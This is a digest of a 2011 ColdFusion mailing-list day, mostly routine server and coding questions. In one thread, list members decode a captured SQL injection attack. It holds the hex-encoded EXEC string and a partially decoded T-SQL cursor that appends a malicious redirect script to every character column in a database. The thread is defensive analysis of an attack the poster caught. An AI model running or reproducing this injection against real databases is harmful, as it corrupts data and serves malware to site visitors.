Re: Ack! CF9 pages not serving pages on IIS7.5 (404.3 error)

2011-05-13 Thread Russ Michaels
you just go into the handler mappings at root or site level and add the handler yourself rather than let the web config tool do it. the advantage is that you can use the same connector for all sites, whereas the config tool creates a new connector for each site, which is pointless on a standard

Exclusive Named Locked / and PreAuthorized Purchasing

2011-05-13 Thread Brook Davies
I am posting this again, the last time the formatting got kinda munged: I am trying to set up an inventory/ticket purchasing system. I have a table that stores the available quantity, and I have a form where users can purchase tickets. The form shows the current number of available tickets.

Re: Extending App.cfc

2011-05-13 Thread Dave Watts
I have an application.cfc in my root folder that defines my app. I also have a subfolder that has its own app.cfc which extends the original app through the ApplicationProxy.cfc method. Basically this is being done to have a different OnRequestStart method. The way I thought I

Can anyone decode this?

2011-05-13 Thread Che Vilnonis
Can anyone decode this? This was a URL attack that was caught by some custom code. I tried decoding the string at http://meyerweb.com/eric/tools/dencoder/ but had no luck. 113|736;DECLARE @S CHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C404320766172636861

Re: Can anyone decode this?

2011-05-13 Thread John M Bliss
Partial: DECLARE @T varchar(255),@C varcha??C?DT4??$R?F??U?7W'6??5U%4??d?R select a.name,b.name from sysobjects7?66??V??2??v?WRC???B???B???xtype='u' and (b.xtype=99 or b.xtype=3?R?G??S?#3??G??S??crT??Table_Cursor FETCH NEXT FROM

RE: Can anyone decode this?

2011-05-13 Thread Che Vilnonis
John, what did you do to decode this? Thanks, Che -Original Message- From: John M Bliss [mailto:bliss.j...@gmail.com] Sent: Friday, May 13, 2011 10:34 AM To: cf-talk Subject: Re: Can anyone decode this? Partial: DECLARE @T varchar(255),@C varcha??C?DT4??$R?F??U?7W'6??5U%4??d?R

Re: Can anyone decode this?

2011-05-13 Thread Christopher Stowell
My guess is based on the partial decoding it has to do with this: http://www.broadbandreports.com/forum/r21043551-sdo1000mgcncsrsswjs-what-is-it From: John M Bliss bliss.j...@gmail.com To: cf-talk cf-talk@houseoffusion.com Sent: Fri, May 13, 2011 8:34:09 AM

Re: Can anyone decode this?

2011-05-13 Thread John M Bliss
http://www.dolcevie.com/js/converter.html On Fri, May 13, 2011 at 9:36 AM, Che Vilnonis ch...@asitv.com wrote: John, what did you do to decode this? Thanks, Che -Original Message- From: John M Bliss [mailto:bliss.j...@gmail.com] Sent: Friday, May 13, 2011 10:34 AM To: cf-talk

RE: Can anyone decode this?

2011-05-13 Thread Jeff Garza
Put this in your SQL Query analyzer tool and change the EXEC at the end to PRINT. It should print out the SQL Statement for you to see what they were trying to do. Cheers, Jeff -Original Message- From: Che Vilnonis [mailto:ch...@asitv.com] Sent: Friday, May 13, 2011 7:31 AM To:

RE: Can anyone decode this?

2011-05-13 Thread Mark A. Kruger
This tries to append a malicious script to all the character columns in your DB in the hopes that you will select them and output them to a page (thus propagating the link). The script is a script block that redirects to a malicious site. Here's the basic outline with the script removed.

Re: Can anyone decode this?

2011-05-13 Thread Russ Michaels
it is some very clever SQL though On Fri, May 13, 2011 at 3:57 PM, Mark A. Kruger mkru...@cfwebtools.com wrote: This tries to append a malicious script to all the character columns in your DB in the hopes that you will select them and output them to a page (thus propagating the link).

RE: Can anyone decode this?

2011-05-13 Thread Mark A. Kruger
Yep a bit cleaner than the last attack like this I saw. -Original Message- From: Russ Michaels [mailto:r...@michaels.me.uk] Sent: Friday, May 13, 2011 10:31 AM To: cf-talk Subject: Re: Can anyone decode this? it is some very clever SQL though On Fri, May 13, 2011 at 3:57 PM, Mark

Coldfusion 9 XML creation and HTML after

2011-05-13 Thread Ken Hammond
Here is what I am running into. I have a web form that takes in the info I need. I process the form on the next page and it creates an XML document that I need (which is being created successfully). I need to display something back to the end user telling them it's been created. After my

cgi.host_name Security Exploit

2011-05-13 Thread Paul Alkema
Greetings and Salutations My Fellow Programmers! I have recently discovered a security flaw that I have reported to the Adobe team regarding the use of the variable cgi.host_name. As you know, the cgi.host_name is typically the hostname of the server or the website's domain name. I've

RE: Can anyone decode this?

2011-05-13 Thread Bobby Hartsfield
DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C

Re: Coldfusion 9 XML creation and HTML after

2011-05-13 Thread Russ Michaels
can you post the code here http://pastebin.com/ On Fri, May 13, 2011 at 5:43 PM, Ken Hammond khamm...@saleminc.com wrote: Here is what I am running into. I have a web form that takes in the info I need. I process the form on the next page and it creates an XML

Re: Coldfusion 9 XML creation and HTML after

2011-05-13 Thread Dave Watts
Here is what I am running into.  I have a web form that takes in the info I need.  I process the form on the next page and it creates an XML document that I need (which is being created successfully).  I need to display something back to the end user telling them it's been created.  After my

Re: cgi.host_name Security Exploit

2011-05-13 Thread Dave Watts
I have recently discovered a security flaw that I have reported to the Adobe team regarding the use of the variable cgi.host_name. As you know, the cgi.host_name is typically the hostname of the server or the website's domain name. I've discovered an exploit that allows a user to basically

Re: Coldfusion 9 XML creation and HTML after

2011-05-13 Thread Anene Isioma Wealth
my guess is that you have answered your question by saying that you could use a cflocation tag. Alternatively, if you trust your xml script to always create the xml document without errors, you may use a prompt to display your activity status just before you use the xml script. Best

Re: cgi.host_name Security Exploit

2011-05-13 Thread Jason Durham
Dave pretty much summed it up. Anybody who knows what a HOSTS file is, knows how to mask the server_name. :) Jason Durham On Fri, May 13, 2011 at 2:28 PM, Dave Watts dwa...@figleaf.com wrote: I have recently discovered a security flaw that I have reported to the Adobe team regarding

Re: Solr Errors

2011-05-13 Thread Mary Jo Sminkey
Just checking in Mary. Were you able to get past this? Have you considered contacting Adobe for official support? No, we had to drop the use of Solr at this time. Just FYI, I did submit a bug report on this, if anyone wants to comment or vote on it.

Getting basic CF8 CFCACHE working in CF9

2011-05-13 Thread Terry Ford
Hey... I am trying to get a CF8 app working on CF9, and it was all seamless until I ran into CFCACHE. I'm having problems getting CFCACHE to save anything to disk. I understand the default behavior is now in-memory caching, but for now I'm just trying to get this thing to work as it did in